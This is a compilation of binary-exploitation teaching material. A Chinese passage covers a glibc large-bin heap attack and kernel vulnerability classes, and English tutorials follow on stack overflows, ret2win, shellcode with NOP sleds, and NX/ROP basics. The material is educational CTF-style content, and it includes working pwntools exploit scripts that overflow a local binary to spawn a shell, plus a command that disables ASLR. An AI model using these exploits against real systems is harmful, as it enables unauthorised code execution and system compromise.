假设我们有一个漏洞,可以对 large bin 里的 chunk p2 进行修改,结合上面的整理过程,我们伪造 p2 如下:
gef➤ x/8gx p2-2
0x555555757130: 0x0000000000000000 0x00000000000003f1 <-- fake p2 [be freed]
0x555555757140: 0x0000000000000000 0x00007fffffffde60 <-- bk
0x555555757150: 0x0000000000000000 0x00007fffffffde58 <-- bk_nextsize
0x555555757160: 0x0000000000000000 0x0000000000000000
同样的,释放 p3,将其放入 unsorted bin,紧接着进行 malloc 操作,将 p3 整理回 large bin,这个过程中判断条件 (unsigned long) (size) < (unsigned long) (bck->bk->size)
为假,程序将进入 else 分支,其中 fwd
是 fake p2,victim
是 p3,接着 bck
被赋值为 (&stack_var1 - 2)。
在 p3 被放回 large bin 并排序的过程中,我们位于栈上的两个变量也被修改成了 victim
,对应的语句分别是 bck->fd = victim;
和 ictim->bk_nextsize->fd_nextsize = victim;
。
gef➤ x/2gx &stack_var1
0x7fffffffde70: 0x0000555555757560 0x0000555555757560
gef➤ x/8gx p2-2
0x555555757130: 0x0000000000000000 0x00000000000003f1
0x555555757140: 0x0000000000000000 0x0000555555757560
0x555555757150: 0x0000000000000000 0x0000555555757560
0x555555757160: 0x0000000000000000 0x0000000000000000
gef➤ x/8gx p3-2
0x555555757560: 0x0000000000000000 0x0000000000000411
0x555555757570: 0x0000555555757130 0x00007fffffffde60
0x555555757580: 0x0000555555757130 0x00007fffffffde58
0x555555757590: 0x0000000000000000 0x0000000000000000
考虑 libc-2.26 上的情况,还是一样的,处理好 tchache 就可以了,在 free 之前把两种大小的 tcache bin 都占满。
3.1.11 Linux 内核漏洞利用
从用户态到内核态
企图 | 用户态漏洞利用 | 内核态漏洞利用 |
---|---|---|
蛮力法利用漏洞 | 应用程序可以多次崩溃并重启(或自动重启) | 这将导致机器陷入不一致的状态,通常会导致死机或重启 |
影响目标程序 | 攻击者对被攻击程序(特别是本地攻击)拥有更多的控制(例如攻击者可以设置被攻击程序的运行环境)。被攻击程序是它的库子系统的唯一使用者(例如内存分配表) | 攻击者需要和其他所有欲“影响”内核的应用程序竞争。所有的应用程序都是内核子系统的使用者 |
执行 shellcode | shellcode 可以利用已经通过安全和正确性保证的用户态门来进行内核系统调用 | shellcode 在更高的权限级别上执行,并且必须在不惊动系统的情况下正确地返回到应用程序 |
绕过反漏洞利用保护措施 | 这要求越来越复杂的方法 | 大部分保护措施在内核态,但并不能保护内核本身。攻击者甚至能禁用大部分保护措施 |
内核漏洞分类
未初始化的、未验证的、已损坏的指针解引用
这类漏洞涵盖了所有使用指针的情况,所指内容遭到破坏、没有被正确设置、或者是没有做足够的验证。
我们知道一个静态声明的指针被初始化为 NULL,但其他情况下这些指针被明确地赋值之前,都是未初始化的,它的值是存放指针处的内存里的任意内容。例如下面这样,指针被存放在栈上,而它的内容是之前函数留在栈上的 "A" 字符串:
#include <stdio.h>
#include <string.h>
void big_stack_usage() {
char big[0x100];
memset(big, 'A', 0x100);
printf("Big stack: %p ~ %p\n", big, big+0x100);
}
void ptr_un_initialized() {
char *p;
printf("Pointer value: %p => %p\n", &p, p);
}
int main() {
big_stack_usage();
ptr_un_initialized();
}
$ gcc -fno-stack-protector pointer.c
$ ./a.out
Big stack: 0x7fffd6b0e400 ~ 0x7fffd6b0e500
Pointer value: 0x7fffd6b0e4f8 => 0x4141414141414141
下面看一个真实的例子,来自 FreeBSD8.0:
struct ucred ucred, *ucp; // [1]
[...]
refcount_init(&ucred.cr_ref, 1);
ucred.cr_uid = ip->i_uid;
ucred.cr_ngroups = 1;
ucred.cr_groups[0] = dp->i_gid; // [2]
ucp = &ucred;
[1] 处的 ucred
在栈上进行了声明,然后 cr_groups[0]
被赋值为 dp->i_gid
。遗憾的是,struct ucred
结构体的定义是这样的:
struct ucred {
u_int cr_ref; /* reference count */
[...]
gid_t *cr_groups; /* groups */
int cr_agroups; /* Available groups */
};
我们看到 cr_groups
是一个指针,而且没有被初始化就直接使用。这也就意味着,dp->i_gid
的值在 ucred
被分配时被写入到栈上的任意地址。
继续看未经验证的指针,这往往发生在多用户的内核地址空间中。我们知道内核空间位于用户空间的上面,它的页表在所有进程的页表中都有备份。有些虚拟地址被选做限制地址,限定地址以上或以下的虚拟地址归内核使用,而其他的归用户空间使用。内核函数也就是使用这个限定地址来判断一个指针指向的是内核还是用户空间。如果是前者,则可能只需做少量的验证,但如果是后者,则要格外小心,否则一个用户空间的地址可能在不受控制的情况下被解引用。
看一个 Linux 的例子,CVE-2008-0009:
error = get_user(base, &iov->iov_base); // [1]
[...]
if (unlikely(!base)) {
error = -EFAULT;
break;
}
[...]
sd.u.userptr = base; // [2]
[...]
size = __splice_from_pipe(pipe, &sd, pipe_to_user);
[...]
static int pipe_to_user(struct pipe_inode_info *pipe, struct pipe_buffer *buf, struct splice_desc *sd)
{
if (!fault_in_pages_writeable(sd->u.userptr, sd->len)) {
src = buf->ops->map(pipe, buf, 1);
ret = __copy_to_user_inatomic(sd->u.userptr, src + buf->offset, sd->len); // [3]
buf->ops->unmap(pipe, buf, src);
[...]
}
代码的第一部分来自函数 vmsplice_to_user()
,在 [1] 处使用了 get_user()
获得了目的指针。该目的指针未经检查就默认它是一个用户地址指针,然后通过 [2] 传递给了 __splice_from_pipe()
,同时传递函数 pipe_to_user
作为 helper function。这个函数依然是未经检查就调用了 __copy_to_user_inatomic()
[3],对该指针做解引用的操作,如果攻击者传递的是一个内核地址,则利用该漏洞能够写入任意数据到任意的内核内存中。这里要知道的还有 Linux 中以两个下划线开头的函数(例如 __copy_to_user_inatomic()
)是不会对所提供的目的(或源)用户指针做任何检查的。
最后,一个被损坏的指针往往是其他漏洞的结果(例如缓冲区溢出),攻击者可以任意修改指针的内容,获得更多的控制权。
内存破坏漏洞
这类漏洞是由于程序的错误操作重写了内核空间的内存(包括内核栈和内核堆)导致的。
内核栈在每次进程进入到内核态时发挥作用。内核栈与用户栈基本相同,但也有一些细小的差别,例如它的大小通常是受限制的。另外,所有进程的内核栈都是一块相同的内核地址空间中的一部分,所以他们开始于不同的虚拟地址并且占据不同的虚拟地址空间。
由于内核栈与用户栈的相似性,其发生漏洞的地方也大体相同,例如使用不安全的函数(strcpy()
, sprintf()
等),数组越界,缓冲区溢出等。
针对内核堆的漏洞往往是缓冲区溢出造成的。通过溢出,重写了溢出块后面的块,或者重写了缓存相关的元数据,都可能造成漏洞利用。
整数误用
整数溢出和符号转换错误是最常见的两种整数误用漏洞。这类漏洞往往不容易单独利用,但它可能会导致另外的一些漏洞(例如内存溢出)的发生。
整数溢出发生在将一个超出整数数据存储范围的数赋值给一个整数变量。在不加控制的加法和乘法运算中如果堆参见运算的参数不加验证,也有可能发生整数溢出。
符号转换错误发生在将一个无符号数当做有符号数处理的时候。一个经典的场景是,一个有符号数经过某个最大值检测后传入一个函数,而这个函数只接收无符号数。
看一个 FreeBSD V6.0 的例子:
int fw_ioctl (struct cdev *dev, u_long cmd, caddr_t data, int flag, fw_proc *td)
{
[...]
int s, i, len, err = 0; [1]
[...]
struct fw_crom_buf *crom_buf = (struct fw_crom_buf *)data; [2]
[...]
if (fwdev == NULL) {
[...]
len = CROMSIZE;
[...]
} else {
[...]
if (fwdev->rommax < CSRROMOFF)
len = 0;
else
len = fwdev->rommax - CSRROMOFF + 4;
}
if (crom_buf->len < len) [3]
len = crom_buf->len;
else
crom_buf->len = len;
err = copyout(ptr, crom_buf->ptr, len); [4]
}
[1] 处的 len
是有符号整数,crom_buf->len
也是有符号数并且该值是我们可以控制的,如果它被设为一个负数,那么无论 len
的值是什么,[3] 处的条件都会满足。然后在 [4] 处,copyout()
被调用,该函数原型如下:
int copyout(const void *__restrict kaddr, void *__restrict udaddr, size_t len) __nonnull(1) __nonnull(2);
第三个参数的类型 size_t
是一个无符号整数,所以当 len
是一个负数的时候,会被认为是一个很大的正整数,造成任意内核内存读取。
更多内存可以参见章节 3.1.2。
竞态条件
如果有两个或两个以上执行者将要执行某一动作并且执行结果会由于它们执行顺序的不同而完全不同时,也就是发生了竞争条件。避免竞争条件的方法有很多,例如通过锁、信号量、条件变量等来保证各种行动者之间的同步性。竞争条件中最重要的一点是可竞争窗口的大小,它对于触发竞态条件的难易至关重要,由于这个原因,一些竞态条件的情况只能在对称多处理器(SMP)中被利用。
逻辑 bug
逻辑 bug 有很多种,下面介绍一个引用计数器溢出。我们知道共享资源都有一个引用计数,并在计数为零时释放掉资源,保持足够的内存空间。操作系统往往提供 get 和 put/drop 这样的函数来显式地增加和减少引用计数。
看一个 FreeBSD V5.0 的例子:
int fpathconf(td, uap)
struct thread *td;
register struct fpathconf_args *uap;
{
struct file *fp;
struct vnode *vp;
int error;
if ((error = fget(td, uap->fd, &fp)) != 0) [1]
return (error);
[...]
switch (fp->f_type) {
case DTYPE_PIPE:
case DTYPE_SOCKET:
if (uap->name != _PC_PIPE_BUF)
return (EINVAL); [2]
p->p_retval[0] = PIPE_BUF;
error = 0;
break;
[...]
out:
fdrop(fp, td); [3]
return (error);
}
fpathconf()
系统调用用于获取一个特定的开放的文件描述符信息。所以该调用开头 [1] 处通过 fget()
获取该文件描述符结构的引用,然后在退出的时候 [3] 处通过 fdrop()
释放该引用。然而在 [2] 处的代码没有释放相关的引用计数就直接返回了。如果多次调用 fpathconf()
并触发 [2] 处的返回,则有可能导致引用计数器的溢出。
Binary Exploitation - Stack
https://ir0nstone.gitbook.io/notes/
Introduction
An Introduction to binary exploitation
Binary Exploitation is about finding vulnerabilities in programs and utilizing them to do what you wish. Sometimes this can result in an authentication bypass or the leaking of classified information, but occasionally (if you're lucky) it can also result in Remote Code Execution (RCE). The most basic forms of binary exploitation occur on the stack, a region of memory that stores temporary variables created by functions in code.
When a new function is called, a memory address in the calling function is pushed to the stack - this way, the program knows where to return to once the called function finishes execution. Let's look at a basic binary to show this.
Analysis
The binary has two files - source.c
and vuln
; the latter is an ELF
file, which is the executable format for Linux (it is recommended to follow along with this with a Virtual Machine of your own, preferably Linux).
We're gonna use a tool called radare2
to analyze the behavior of the binary when functions are called.
$ r2 -d -A vuln
The -d
runs it while the -A
performs the analysis. We can disassemble the main
with
s main; pdf
s main
seeks (moves) to main, while pdf
stands for Print Disassembly Function (literally just disassembles it).
0x080491ab 55 push ebp
0x080491ac 89e5 mov ebp, esp
0x080491ae 83e4f0 and esp, 0xfffffff0
0x080491b1 e80d000000 call sym.__x86.get_pc_thunk.ax
0x080491b6 054a2e0000 add eax, 0x2e4a
0x080491bb e8b2ffffff call sym.unsafe
0x080491c0 90 nop
0x080491c1 c9 leave
0x080491c2 c3 ret
The call to unsafe
is at 0x080491bb
, so let's break there.
db 0x080491bb
db
stands for debug breakpoint and just sets a breakpoint. A breakpoint is simply somewhere that pauses the program for you to run other commands when reached. Now we run dc
for debug continue; this just carries on running the file.
It should break before unsafe
is called; let's analyze the top of the stack now:
[0x08049172]> pxw @ esp
0xff984af0 0xf7efe000 [...]
The first address, 0xff984af0
, is the position; the 0xf7efe000
is the value. Let's move one more instruction with the ds
, debug step, and check the stack again.
[0x08049172]> pxw @ esp
0xff984aec 0x080491c0 0xf7efe000
Huh, something's been pushed onto the stack - the value 0x080491c0
. This looks like it's in the binary - but where?
[...]
0x080491b6 054a2e0000 add eax, 0x2e4a
0x080491bb e8b2ffffff call sym.unsafe
0x080491c0 90 nop
[...]
Look at that - it's the instruction after the call to unsafe
. Why? This is how the program knows where to return to after *unsafe()*
has finished.
Weaknesses
But as we're interested in binary exploitation, let's see how we can possibly break this. First, let's disassemble unsafe
and break on the ret
instruction; ret
is the equivalent of pop eip
, which will get the saved return pointer we just analyzed on the stack into the eip
register. Then let's continue and spam a bunch of characters into the input and see how that could affect it.
[0x08049172]> db 0x080491aa
[0x08049172]> dc
Overflow me
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Now let's read the value at the location the return pointer was at previously, which as we saw was 0xff984aec
.
[0x080491aa]> pxw @ 0xff984aec
0xff984aec 0x41414141 0x41414141 0x41414141 0x41414141 AAAAAAAAAAAAAAAA
Huh?
It's quite simple - we inputted more data than the program expected, which resulted in us overwriting more of the stack than the developer expected. The saved return pointer is also on the stack, meaning we managed to overwrite it. As a result, on the ret
, the value popped into eip
won't be in the previous function but rather 0x41414141
. Let's check with ds
.
[0x080491aa]> ds
[0x41414141]>
And look at the new prompt - 0x41414141
. Let's run dr eip
to make sure that's the value in eip
:
[0x41414141]> dr eip
0x41414141
Yup, it is! We've successfully hijacked the program execution! Let's see if it crashes when we let it run with dc
.
[0x41414141]> dc
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41414141 code=1 ret=0
radare2
is very useful and prints out the address that causes it to crash. If you cause the program to crash outside of a debugger, it will usually say Segmentation Fault
, which could mean a variety of things, but usually that you have overwritten EIP.
Of course, you can prevent people from writing more characters than expected when making your program, usually using other C functions such as
fgets()
;gets()
is intrinsically unsafe because it doesn't check the length of the input, meaning that the presence ofgets()
is always something you should check out in a program. It is also possible to givefgets()
the wrong parameters, meaning it still takes in too many characters.
Summary
When a function calls another function, it
- pushes a return pointer to the stack so the called function knows where to return
- when the called function finishes execution, it pops it off the stack again
Because this value is saved on the stack, just like our local variables, if we write more characters than the program expects, we can overwrite the value and redirect code execution to wherever we wish. Functions such as fgets()
can prevent such easy overflow, but you should check how much is actually being read.
ret2win
The most basic binexp challenge
A ret2win is simply a binary where there is a win()
function (or equivalent); once you successfully redirect execution there, you complete the challenge.
To carry this out, we have to leverage what we learned in the introduction, but in a predictable manner - we have to overwrite EIP, but to a specific value of our choice.
To do this, what do we need to know? Well, a couple of things:
- The padding until we begin to overwrite the return pointer (EIP)
- What value do we want to overwrite EIP to
When I say "overwrite EIP", I mean overwrite the saved return pointer that gets popped into EIP. The EIP register is not located on the stack, so it is not overwritten directly.
Finding the Padding
This can be found using simple trial and error; if we send a variable number of characters, we can use the Segmentation Fault
message, in combination with radare2, to tell when we overwrote EIP. There is a better way to do it than simple brute force (we'll cover this in the next post), but it'll do for now.
You may get a segmentation fault for reasons other than overwriting EIP; use a debugger to make sure the padding is correct.
We get an offset of 52 bytes.
Finding the Address
Now we need to find the address of the flag()
function in the binary. This is simple.
$ r2 -d -A vuln
$ afl
[...]
0x080491c3 1 43 sym.flag
[...]
afl
stands for Analyse Functions List
The flag()
function is at 0x080491c3
.
Using the Information
The final piece of the puzzle is to work out how we can send the address we want. If you think back to the introduction, the A
s that we sent became 0x41
- which is the ASCII code of A
. So the solution is simple - let's just find the characters with ASCII codes 0x08
, 0x04
, 0x91
, and 0xc3
.
This is a lot simpler than you might think because we can specify them in Python as hex:
address = '\x08\x04\x91\xc3'
And that makes it much easier.
Putting it Together
Now we know the padding and the value, let's exploit the binary! We can use pwntools
to interface with the binary (check out the pwntools posts for a more in-depth look).
from pwn import * # This is how we import pwntools
p = process('./vuln') # We're starting a new process
payload = 'A' * 52
payload += '\x08\x04\x91\xc3'
p.clean() # Receive all the text
p.sendline(payload)
log.info(p.clean()) # Output the "Exploited!" string to know we succeeded
If you run this, there is one small problem: it won't work. Why? Let's check with a debugger. We'll put a pause()
to give us time to attach radare2
to the process.
from pwn import *
p = process('./vuln')
payload = b'A' * 52
payload += '\x08\x04\x91\xc3'
log.info(p.clean())
pause() # add this in
p.sendline(payload)
log.info(p.clean())
Now let's run the script with python3 exploit.py
and then open up a new terminal window.
r2 -d -A $(pidof vuln)
By providing the PID of the process, radare2 hooks onto it. Let's break at the return of unsafe()
and read the value of the return pointer.
[0x08049172]> db 0x080491aa
[0x08049172]> dc
<< press any button on the exploit terminal window >>
hit breakpoint at: 80491aa
[0x080491aa]> pxw @ esp
0xffdb0f7c 0xc3910408 [...]
[...]
0xc3910408
- look familiar? It's the address we were trying to send over, except the bytes have been reversed, and the reason for this reversal is endianness. Big-endian systems store the most significant byte (the byte with the largest value) at the smallest memory address, and this is how we sent them. Little-endian does the opposite (for a reason), and most binaries you will come across are little-endian. As far as we're concerned, the byte is stored in reverse order in little-endian executables.
Finding the Endianness
radare2
comes with a nice tool called rabin2
for binary analysis:
$ rabin2 -I vuln
[...]
endian little
[...]
So our binary is little-endian.
Accounting for Endianness
The fix is simple - reverse the address (you can also remove the pause()
)
payload += '\x08\x04\x91\xc3'[::-1]
If you run this now, it will work:
$ python3 tutorial.py
[+] Starting local process './vuln': pid 2290
[*] Overflow me
[*] Exploited!!!!!
And wham, you've called the flag()
function! Congrats!
Pwntools and Endianness
Unsurprisingly, you're not the first person to have thought "Could they possibly make endianness simpler" - luckily, pwntools has a built-in p32()
function ready for use!
payload += '\x08\x04\x91\xc3'[::-1]
becomes
payload += p32(0x080491c3)
Much simpler, right?
The only caveat is that it returns bytes
rather than a string, so you have to make the padding a byte string:
payload = b'A' * 52 # Notice the "b"
Otherwise, you will get a
TypeError: can only concatenate str (not "bytes") to str
Final Exploit
from pwn import * # This is how we import pwntools
p = process('./vuln') # We're starting a new process
payload = b'A' * 52
payload += p32(0x080491c3) # Use pwntools to pack it
log.info(p.clean()) # Receive all the text
p.sendline(payload)
log.info(p.clean()) # Output the "Exploited!" string to know we succeeded
De Bruijn Sequences
The better way to calculate offsets
De Bruijn sequences of order n
is simply a sequence where no string of n
characters is repeated. This makes finding the offset until EIP much simpler - we can just pass in a De Bruijn sequence, get the value within EIP and find the one possible match within the sequence to calculate the offset. Let's do this on the ret2win binary.
Generating the Pattern
Again, radare2
comes with a nice command-line tool (called ragg2
) that can generate it for us. Let's create a sequence of length 100
.
$ ragg2 -P 100 -r
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh
The -P
specifies the length while -r
tells it to show ascii bytes rather than hex pairs.
Using the Pattern
Now we have the pattern, let's just input it in radare2
when prompted for input, make it crash, and then calculate how far along the sequence the EIP is. Simples.
$ r2 -d -A vuln
[0xf7ede0b0]> dc
Overflow me
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41534141 code=1 ret=0
The address it crashes on is 0x41534141
; we can use radare2
's in-built wopO
command to work out the offset.
[0x41534141]> wopO 0x41534141
52
Awesome - we get the correct value!
We can also be lazy and not copy the value.
[0x41534141]> wopO `dr eip`
52
The backticks mean the dr eip
is calculated first before the wopO
is run on the result of it.
Shellcode
Running your own code
In real exploits, it's not particularly likely that you will have a win()
function lying around - shellcode is a way to run your own instructions, giving you the ability to run arbitrary commands on the system.
Shellcode is essentially assembly instructions, except we input them into the binary; once we input it, we overwrite the return pointer to hijack code execution and point at our own instructions!
I promise you can trust me but you should never ever run shellcode without knowing what it does. Pwntools is safe and has almost all the shellcode you will ever need.
The reason shellcode is successful is that Von Neumann architecture (the architecture used in most computers today) does not differentiate between data and instructions - it doesn't matter where or what you tell it to run, it will attempt to run it. Therefore, even though our input is data, the computer doesn't know that - and we can use that to our advantage.
Disabling ASLR
ASLR is a security technique, and while it is not specifically designed to combat shellcode, it involves randomizing certain aspects of memory (we will talk about it in much more detail later). This randomization can make shellcode exploits like the one we're about to do less reliable, so we'll be disabling it, for now, using this.
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Again, you should never run commands if you don't know what they do
Finding the Buffer in Memory
Let's debug vuln()
using radare2
and work out where in memory the buffer starts; this is where we want to point the return pointer to.
$ r2 -d -A vuln
[0xf7fd40b0]> s sym.unsafe ; pdf
[...]
; var int32_t var_134h @ ebp-0x134
[...]
This value that gets printed out is a local variable - due to its size, it's fairly likely to be the buffer. Let's set a breakpoint just after gets()
and find the exact address.
[0x08049172]> dc
Overflow me
<<Found me>> <== This was my input
hit breakpoint at: 80491a8
[0x080491a8]> px @ ebp - 0x134
- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
0xffffcfb4 3c3c 466f 756e 6420 6d65 3e3e 00d1 fcf7 <<Found me>>....
[...]
It appears to be at 0xffffcfd4
; if we run the binary multiple times, it should remain where it is (if it doesn't, make sure ASLR is disabled!).
Finding the Padding
Now we need to calculate the padding until the return pointer. We'll use the De Bruijn sequence as explained in the previous blog post.
$ ragg2 -P 400 -r
<copy this>
$ r2 -d -A vuln
[0xf7fd40b0]> dc
Overflow me
<<paste here>>
[0x73424172]> wopO `dr eip`
312
The padding is 312 bytes.
Putting it all together
In order for the shellcode to be correct, we're going to set the context.binary
to our binary; this grabs stuff like the arch, OS, and bits and enables pwntools to provide us with working shellcode.
from pwn import *
context.binary = ELF('./vuln')
p = process()
We can use just
process()
because once thecontext.binary
is set it is assumed to use that process
Now we can use pwntools' awesome shellcode functionality to make it incredibly simple.
payload = asm(shellcraft.sh()) # The shellcode
payload = payload.ljust(312, b'A') # Padding
payload += p32(0xffffcfb4) # Address of the Shellcode
Yup, that's it. Now let's send it off and use p.interactive()
, which enables us to communicate to the shell.
log.info(p.clean())
p.sendline(payload)
p.interactive()
If you're getting an
EOFError
, print out the shellcode and try to find it in memory - the stack address may be wrong
$ python3 exploit.py
[*] 'vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
[+] Starting local process 'vuln': pid 3606
[*] Overflow me
[*] Switching to interactive mode
$ whoami
ironstone
$ ls
exploit.py source.c vuln
And it works! Awesome.
Final Exploit
from pwn import *
context.binary = ELF('./vuln')
p = process()
payload = asm(shellcraft.sh()) # The shellcode
payload = payload.ljust(312, b'A') # Padding
payload += p32(0xffffcfb4) # Address of the Shellcode
log.info(p.clean())
p.sendline(payload)
p.interactive()
Summary
- We injected shellcode, a series of assembly instructions, when prompted for input
- We then hijacked code execution by overwriting the saved return pointer on the stack and modified it to point to our shellcode
- Once the return pointer got popped into EIP, it pointed at our shellcode
- This caused the program to execute our instructions, giving us (in this case) a shell for arbitrary command execution
NOPs
More reliable shellcode exploits
NOP (no operation) instructions do exactly what they sound like nothing. This makes them very useful for shellcode exploits because all they will do is run the next instruction. If we pad our exploits on the left with NOPs and point EIP in the middle of them, it'll simply keep doing no instructions until it reaches our actual shellcode. This allows us a greater margin of error as a shift of a few bytes forward or backward won't really affect it, it'll just run a different number of NOP instructions - which have the same end result of running the shellcode. This padding with NOPs is often called a NOP slide or NOP sled since the EIP is essentially sliding down them.
In intel x86 assembly, NOP instructions are \x90
.
The NOP instruction actually used to stand for
XCHG EAX, EAX
, which does effectively nothing. You can read a bit more about it on this StackOverflow question.
Updating our Shellcode Exploit
We can make slight changes to our exploit to do two things:
- Add a large number of NOPs on the left
- Adjust our return pointer to point at the middle of the NOPs rather than the buffer start
Make sure ASLR is still disabled. If you have to disable it again, you may have to readjust your previous exploit as the buffer location may be different.
from pwn import *
context.binary = ELF('./vuln')
p = process()
payload = b'\x90' * 240 # The NOPs
payload += asm(shellcraft.sh()) # The shellcode
payload = payload.ljust(312, b'A') # Padding
payload += p32(0xffffcfb4 + 120) # Address of the buffer + half nop length
log.info(p.clean())
p.sendline(payload)
p.interactive()
It's probably worth mentioning that shellcode with NOPs is not failsafe; if you receive unexpected errors padding with NOPs but the shellcode worked before, try reducing the length of the nopsled as it may be tampering with other things on the stack
Note that NOPs are only \x90
in certain architectures, and if you need others you can use pwntools:
nop = asm(shellcraft.nop())
32- vs 64-bit
The differences between the sizes
Everything we have done so far is applicable to 64-bit as well as 32-bit; the only thing you would need to change is switching out the p32()
for p64()
as the memory addresses are longer.
The real difference between the two, however, is the way you pass parameters to functions (which we'll be looking at much closer soon); in 32-bit, all parameters are pushed to the stack before the function is called. In 64-bit, however, the first 6 are stored in the registers RDI, RSI, RDX, RCX, R8, and R9 respectively as per the calling convention. Note that different Operating Systems also have different calling conventions.
Binary Exploitation - Stack
https://ir0nstone.gitbook.io/notes/
No eXecute
The defense against shellcode
As you can expect, programmers were hardly pleased that people could inject their own instructions into the program. The NX bit, which stands for No eXecute, defines areas of memory as either instructions or data. This means that your input will be stored as data, and any attempt to run it as instructions will crash the program, effectively neutralizing the shellcode.
To get around NX, exploit developers have to leverage a technique called ROP, Return-Oriented Programming.
The Windows version of NX is DEP, which stands for Data Execution Prevention
Checking for NX
You can either use pwntools' checksec
or rabin2
.
$ checksec vuln
[*] 'vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
$ rabin2 -I vuln
[...]
nx false
[...]
Return-Oriented Programming
Bypassing NX
The basis of ROP is chaining together small chunks of code already present within the binary itself in such a way as to do what you wish. This often involves passing parameters to functions already present within libc
, such as system
- if you can find the location of a command, such as cat flag.txt
, and then pass it as a parameter to the system
, it will execute that command and return the output. A more dangerous command is /bin/sh
, which when run by the system
gives the attacker a shell much like the shellcode we used did.
Doing this, however, is not as simple as it may seem at first. To be able to properly call functions, we first have to understand how to pass parameters to them.
Calling Conventions
A more in-depth look into parameters for 32-bit and 64-bit programs
One Parameter
Source
Let's have a quick look at the source:
#include <stdio.h>
void vuln(int check) {
if(check == 0xdeadbeef) {
puts("Nice!");
} else {
puts("Not nice!");
}
}
int main() {
vuln(0xdeadbeef);
vuln(0xdeadc0de);
}
Pretty simple.
If we run the 32-bit and 64-bit versions, we get the same output:
Nice!
Not nice!
Just what we expected.
Analyzing 32-bit
Let's open the binary up in radare2 and disassemble it.
$ r2 -d -A vuln-32
$ s main; pdf
0x080491ac 8d4c2404 lea ecx, [argv]
0x080491b0 83e4f0 and esp, 0xfffffff0
0x080491b3 ff71fc push dword [ecx - 4]
0x080491b6 55 push ebp
0x080491b7 89e5 mov ebp, esp
0x080491b9 51 push ecx
0x080491ba 83ec04 sub esp, 4
0x080491bd e832000000 call sym.__x86.get_pc_thunk.ax
0x080491c2 053e2e0000 add eax, 0x2e3e
0x080491c7 83ec0c sub esp, 0xc
0x080491ca 68efbeadde push 0xdeadbeef
0x080491cf e88effffff call sym.vuln
0x080491d4 83c410 add esp, 0x10
0x080491d7 83ec0c sub esp, 0xc
0x080491da 68dec0adde push 0xdeadc0de
0x080491df e87effffff call sym.vuln
0x080491e4 83c410 add esp, 0x10
0x080491e7 b800000000 mov eax, 0
0x080491ec 8b4dfc mov ecx, dword [var_4h]
0x080491ef c9 leave
0x080491f0 8d61fc lea esp, [ecx - 4]
0x080491f3 c3 ret
If we look closely at the calls to sym.vuln
, we see a pattern:
push 0xdeadbeef
call sym.vuln
[...]
push 0xdeadc0de
call sym.vuln
We literally push
the parameter to the stack before calling the function. Let's break on sym.vuln
.
[0x080491ac]> db sym.vuln
[0x080491ac]> dc
hit breakpoint at: 8049162
[0x08049162]> pxw @ esp
0xffdeb54c 0x080491d4 0xdeadbeef 0xffdeb624 0xffdeb62c
The first value there is the return pointer that we talked about before - the second, however, is the parameter. This makes sense because the return pointer gets pushed during the call
, so it should be at the top of the stack. Now let's disassemble sym.vuln
.
┌ 74: sym.vuln (int32_t arg_8h);
│ ; var int32_t var_4h @ ebp-0x4
│ ; arg int32_t arg_8h @ ebp+0x8
│ 0x08049162 b 55 push ebp
│ 0x08049163 89e5 mov ebp, esp
│ 0x08049165 53 push ebx
│ 0x08049166 83ec04 sub esp, 4
│ 0x08049169 e886000000 call sym.__x86.get_pc_thunk.ax
│ 0x0804916e 05922e0000 add eax, 0x2e92
│ 0x08049173 817d08efbead. cmp dword [arg_8h], 0xdeadbeef
│ ┌─< 0x0804917a 7516 jne 0x8049192
│ │ 0x0804917c 83ec0c sub esp, 0xc
│ │ 0x0804917f 8d9008e0ffff lea edx, [eax - 0x1ff8]
│ │ 0x08049185 52 push edx
│ │ 0x08049186 89c3 mov ebx, eax
│ │ 0x08049188 e8a3feffff call sym.imp.puts ; int puts(const char *s)
│ │ 0x0804918d 83c410 add esp, 0x10
│ ┌──< 0x08049190 eb14 jmp 0x80491a6
│ │└─> 0x08049192 83ec0c sub esp, 0xc
│ │ 0x08049195 8d900ee0ffff lea edx, [eax - 0x1ff2]
│ │ 0x0804919b 52 push edx
│ │ 0x0804919c 89c3 mov ebx, eax
│ │ 0x0804919e e88dfeffff call sym.imp.puts ; int puts(const char *s)
│ │ 0x080491a3 83c410 add esp, 0x10
│ │ ; CODE XREF from sym.vuln @ 0x8049190
│ └──> 0x080491a6 90 nop
│ 0x080491a7 8b5dfc mov ebx, dword [var_4h]
│ 0x080491aa c9 leave
└ 0x080491ab c3 ret
Here I'm showing the full output of the command because a lot of it is relevant. radare2
does a great job of detecting local variables - as you can see at the top, there is one called arg_8h
. Later this same one is compared to 0xdeadbeef
:
cmp dword [arg_8h], 0xdeadbeef
Clearly, that's our parameter.
So now we know, when there's one parameter, it gets pushed to the stack so that the stack looks like this:
return address param_1
Analyzing 64-bit
Let's disassemble the main
again here.
0x00401153 55 push rbp
0x00401154 4889e5 mov rbp, rsp
0x00401157 bfefbeadde mov edi, 0xdeadbeef
0x0040115c e8c1ffffff call sym.vuln
0x00401161 bfdec0adde mov edi, 0xdeadc0de
0x00401166 e8b7ffffff call sym.vuln
0x0040116b b800000000 mov eax, 0
0x00401170 5d pop rbp
0x00401171 c3 ret
Hohoho, it's different. As we mentioned before, the parameter gets moved to rdi
(in the disassembly here it's edi
, but edi
is just the lower 32 bits of rdi
, and the parameter is only 32 bits long, so it says EDI
instead). If we break on sym.vuln
again we can check rdi
with the command
dr rdi
Just
dr
will display all registers
[0x00401153]> db sym.vuln
[0x00401153]> dc
hit breakpoint at: 401122
[0x00401122]> dr rdi
0xdeadbeef
Awesome.
